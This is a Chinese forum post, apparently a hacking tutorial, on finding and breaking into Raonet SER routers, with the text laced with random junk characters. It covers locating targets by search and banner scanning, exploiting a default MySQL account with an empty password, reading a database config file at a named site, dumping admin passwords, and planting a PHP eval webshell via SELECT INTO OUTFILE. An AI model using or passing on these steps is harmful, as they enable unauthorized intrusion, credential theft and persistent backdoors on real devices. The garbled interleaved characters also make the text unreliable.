寻找存在漏洞的路由器方法:- g$ D$ Y2 h, L, ?( i1 ~: T3 [) R
) }7 B+ e" L0 c, P: u4 j1:google搜索'Raonet Subscriber Ethernet Router'
; B6 A6 c: i# c2 L: E0 `2 R/ v% H/ N' T& X$ R2 X
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20019 i0 `# f/ V4 \ i% N0 W. \/ H
; b7 P2 O% F7 m' G9 o& T
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。) r w: V) o- J/ ]5 X
5 n$ u% s m* t3 Q+ x" @5 J//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......; v6 _- I# O+ D3 a/ c$ h) M
6 \( |- O# ^0 [ : s+ R) T& u+ P
8 ^) v+ P( _$ i: g, E
入侵步骤:+ F4 j5 x9 l( f& W, i
}1 c j6 `; j9 n4 R% n$ F1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
+ k8 Z! A W* Y* t! N$ g, P. O, a5 [) S! ~: g9 z* Q
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
6 m+ t( U4 n$ v) e3:得到密码后连接,查看GUI管理密码:( h9 p* ?: e0 G- v
use ser_500
0 g- k# E- }& O9 Iselect id,passwd from user;
- o% L; \; [- W, F4:通过数据库写入webshell,执行命令:( m$ }- e" c: d6 f6 }1 L/ {+ u& f
use mysql;9 M2 g, I# t& X5 O! W
create table ok(cmd TEXT);% Z9 r$ ~# Y# r' D! b1 M9 u& y
insert into ok values("<?php @eval($_POST[cmd])?>");8 L% d- U" ?) h" k- C5 T
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
3 t9 B$ ^3 O6 v4 \0 H! ndrop table ok;5 k0 c& P4 b# \8 E$ r% ~$ E8 q
# c" r2 ]3 s: c0 z& G( ^5:连接后门shell.php
" U' s" g6 T; \ v# G0 {# m$ r" G4 o
6. 搞定!% Q. V/ g4 ?! |7 N) M9 _& a+ K* Q
9 n( j0 y6 v$ p7 S/ F4 p! C- } |